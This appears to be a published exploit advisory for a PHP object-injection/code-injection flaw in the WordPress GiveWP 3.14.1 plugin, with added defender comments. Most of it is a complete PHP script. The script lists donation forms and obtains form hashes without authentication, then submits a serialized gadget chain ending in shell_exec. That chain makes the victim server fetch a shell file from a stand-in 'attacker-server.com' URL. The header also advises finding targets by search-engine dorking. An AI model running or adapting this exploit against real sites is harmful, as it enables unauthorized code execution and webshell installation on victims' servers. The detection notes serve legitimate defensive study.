WordPress GiveWP Donation Fundraising Platform 3.14.1 Code Injection
WordPress GiveWP Donation Fundraising Platform version 3.14.1 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://givewp.com/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 78 set your file link.[+] Line 127. set your target.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :
<?php
// Proof-of-concept client for the GiveWP 3.14.1 issue described above.
//
// What the code below actually does (all three steps are plain POSTs to
// /wp-admin/admin-ajax.php with no cookie, nonce or auth header):
//   1. action=give_form_search        -> enumerate donation form IDs
//   2. action=give_donation_form_nonce -> obtain the per-form hash
//   3. action=give_process_donation    -> submit a donation whose donor
//      "give_title" field carries a serialized PHP object graph
//
// NOTE(review): the advisory text says "code injection" but does not name the
// sink; the shape of step 3 (a serialized object in a donor field) suggests the
// plugin unserializes donor-supplied data — confirm against the vendor fix.
//
// Defender notes: the distinguishing artefact in request logs / a WAF is a
// serialized object (`O:<n>:"...` with `\0*\0` protected-property markers)
// inside donation POST parameters, combined with action=give_process_donation.
// The first-line mitigation is updating GiveWP to a release that addresses the
// advisory; a site that must stay on 3.14.1 can block or scrutinize serialized
// payloads in donation fields at the edge.
class GiveWPExploit {
    // Base URL of the WordPress site (scheme + host, no trailing slash).
    private $targetUrl;
    // Request headers sent with every POST; only the form content type is set.
    private $headers;

    // $targetUrl: base URL of the site, e.g. 'http://127.0.0.1' (see usage below).
    public function __construct($targetUrl) {
        $this->targetUrl = $targetUrl;
        $this->headers = array(
            'Content-Type: application/x-www-form-urlencoded'
        );
    }

    // Step 1: enumerate forms via the give_form_search AJAX action.
    // Returns the decoded JSON list on HTTP 200, false otherwise.
    // Defender note: this request is entirely unauthenticated (no cookie or
    // nonce, see $this->headers), so a 200 with a form list here shows the
    // action is reachable anonymously.
    public function check() {
        $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array('action' => 'give_form_search'));
        // Loose comparison (!=) against the parsed status code.
        if (!$response || $response['http_code'] != 200) {
            echo "Failed to retrieve form list.\n";
            return false;
        }
        $forms = json_decode($response['body'], true);
        // empty() also rejects a JSON "null"/"false" body, not just [].
        if (empty($forms)) {
            echo "No forms found.\n";
            return false;
        }
        echo "Successfully retrieved form list. Available Form IDs: " . implode(', ', array_column($forms, 'id')) . "\n";
        return $forms;
    }

    // Entry point: picks one form at random, fetches its hash, then submits
    // the crafted donation. Returns nothing; progress is reported via echo.
    public function exploit() {
        $forms = $this->check();
        if (!$forms) {
            return;
        }
        // array_rand() picks a random key; the form used differs per run, so
        // the donation records created on the target are not predictable.
        $selectedForm = $forms[array_rand($forms)];
        $validForm = $this->retrieveAndAnalyzeForm($selectedForm['id']);
        if (!$validForm) {
            echo "Failed to retrieve a valid form for exploitation.\n";
            return;
        }
        echo "Using Form ID: " . $validForm['give_form_id'] . " for exploitation.\n";
        $this->sendExploitRequest($validForm);
    }

    // Step 2: request the per-form hash via give_donation_form_nonce and
    // build the field set a donation submission needs.
    // Returns an array with give_form_id / give_form_hash / give_price_id /
    // give_amount, or false if the request fails or no hash comes back.
    private function retrieveAndAnalyzeForm($formId) {
        $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array(
            'action' => 'give_donation_form_nonce',
            'give_form_id' => $formId
        ));
        if (!$response || $response['http_code'] != 200) {
            return false;
        }
        $formData = json_decode($response['body'], true);
        $giveFormId = $formId;
        // The hash is read straight from the JSON "data" member; no check that
        // the key exists, so a non-JSON body produces a PHP notice and false.
        $giveFormHash = $formData['data'];
        $givePriceId = '0'; // Default price ID
        $giveAmount = '$10.00'; // Default amount
        if (!$giveFormHash) {
            return false;
        }
        return array(
            'give_form_id' => $giveFormId,
            'give_form_hash' => $giveFormHash,
            'give_price_id' => $givePriceId,
            'give_amount' => $giveAmount
        );
    }

    // Step 3: submit a donation whose give_title field is the serialized
    // object graph. $validForm is the array returned by retrieveAndAnalyzeForm.
    // Detection notes for defenders:
    //   - the blob lands in the POST parameter "give_title", alongside
    //     give-gateway=offline and action=give_process_donation;
    //   - the class names inside it (Stripe\StripeObject,
    //     Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData,
    //     Give\Vendors\Faker\ValidGenerator, Give\Onboarding\SettingsRepository)
    //     and the literal "shell_exec" are stable strings to alert on;
    //   - $remoteFileUrl is the operator-controlled URL spliced into the
    //     "address1" string via %d:"%s", i.e. the network IoC to hunt for in
    //     outbound connections from the web server right after such a request.
    private function sendExploitRequest($validForm) {
        // URL of the malicious file to be fetched
        // (placeholder value in the published PoC; "Line 78" in the header refers to this line in the original file)
        $remoteFileUrl = 'http://attacker-server.com/malicious-file.php';
        // Payload that uses file_get_contents to fetch the remote file
        // The single-quoted '\\\\' sequences become '\\' in the actual string,
        // i.e. one escaped backslash per namespace separator; '\\0' becomes
        // the "\0" protected-property marker of PHP's serialize() format.
        $payload = sprintf(
            'O:19:"Stripe\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\Onboarding\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}}}}}}}',
            strlen($remoteFileUrl),
            $remoteFileUrl
        );
        // Everything except give_title is ordinary donation-form input; the
        // values only need to pass the form's own validation.
        $data = array(
            'give-form-id' => $validForm['give_form_id'],
            'give-form-hash' => $validForm['give_form_hash'],
            'give-price-id' => $validForm['give_price_id'],
            'give-amount' => $validForm['give_amount'],
            'give_first' => 'Test',
            'give_last' => 'User',
            // '[email protected]' is an artefact of the publishing site's address
            // obfuscation, not a real address; kept as published.
            'give_email' => '[email protected]',
            'give_title' => $payload,
            'give-gateway' => 'offline',
            'action' => 'give_process_donation'
        );
        // The response is discarded; success is not verified by this script.
        $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', $data);
    }

    // Minimal HTTP helper built on the PHP stream wrapper (no cURL).
    // $method: HTTP verb; $url: absolute URL; $data: form fields, urlencoded.
    // Returns array{http_code:int, body:string} or false when the stream
    // wrapper fails outright (connection error, or a non-2xx status if the
    // wrapper is configured to treat those as failures).
    private function sendRequest($method, $url, $data) {
        $options = array(
            'http' => array(
                'method' => $method,
                'header' => implode("\r\n", $this->headers),
                'content' => http_build_query($data)
            )
        );
        $context = stream_context_create($options);
        $result = file_get_contents($url, false, $context);
        if ($result === false) {
            return false;
        }
        // $http_response_header is populated by file_get_contents in this
        // function's scope; the status code is cut from the status line by
        // fixed offset ("HTTP/1.x NNN ..."), so it assumes that exact layout.
        return array(
            'http_code' => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code
            'body' => $result
        );
    }
}
// Usage
// Target is hard-coded to localhost in the published PoC ("Line 127" in the
// header presumably refers to this line in the original file).
$exploit = new GiveWPExploit('http://127.0.0.1');
$exploit->exploit();
?>
Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================